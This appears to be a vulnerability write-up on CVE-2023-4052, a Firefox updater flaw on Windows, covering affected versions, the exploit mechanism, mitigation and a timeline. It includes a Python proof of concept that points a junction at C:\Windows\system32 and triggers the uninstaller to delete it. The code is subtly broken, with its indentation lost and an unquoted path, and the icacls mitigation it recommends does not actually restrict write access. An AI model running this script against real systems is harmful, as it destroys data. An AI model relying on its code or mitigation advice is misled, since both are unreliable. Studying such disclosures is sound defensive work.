CVE-2023-4052 is a security vulnerability present in the Firefox updater on Windows systems. This vulnerability is caused due to an improperly secured directory allowing non-privileged users to write files which, when combined with symbolic links, leads to an arbitrary file deletion vulnerability. This bug only affects Firefox running on Windows, and other operating systems are not impacted. The affected software versions are Firefox < 116, Firefox ESR < 115.1, and Thunderbird < 115.1.
Here is an example of how a non-privileged user could manipulate the vulnerable directory
import os
import sys
import ctypes
# Create junction (symbolic link) to a system folder we want to delete
os.system("mklink /J C:\\Users\\Public\\Documents\\Mozilla\\Junction_To_Delete C:\\Windows\\system32")
# Perform the Firefox uninstall process, which would delete the files within the junction
os.system("C:\\Program Files\\Mozilla Firefox\\uninstall\\helper.exe")
# Verify that the junction and the actual system folder have been removed
if not os.path.exists("C:\\Users\\Public\\Documents\\Mozilla\\Junction_To_Delete"):
print("Junction removed.")
else:
print("Junction not removed.")
if not os.path.exists("C:\\Windows\\system32"):
print("System folder successfully deleted.")
else:
print("System folder deletion failed.")
Exploit Details
In CVE-2023-4052, the Firefox updater creates a directory and leaves it writable by non-privileged users. This directory is C:\Users\Public\Documents\Mozilla\. During the uninstallation process, files within this directory are deleted recursively with the permissions of the uninstalling user account.
An attacker with non-privileged access to the system can exploit this vulnerability by creating a junction (a symbolic link) from the vulnerable directory to a target directory that they want to delete. When Firefox is uninstalled, the contents of the target directory would be deleted along with files in the vulnerable directory.
This vulnerability can lead to arbitrary file deletion controlled by a non-privileged user, causing significant damage to the system and data loss.
For more information and details about this vulnerability, refer to the following links
- Mozilla Security Advisory
- National Vulnerability Database (NVD) Entry
- Mozilla Bugzilla Ticket
Mitigation
The best way to mitigate this vulnerability is by updating your Firefox, Firefox ESR, or Thunderbird instance to a non-vulnerable version:
You can also restrict access to the vulnerable directory by executing the following command
icacls "C:\Users\Public\Documents\Mozilla" /inheritance:d
However, this is a temporary solution and updating to the correct version is strongly recommended.
Timeline
Published on: 08/01/2023 15:15:00 UTC
Last modified on: 08/07/2023 14:15:00 UTC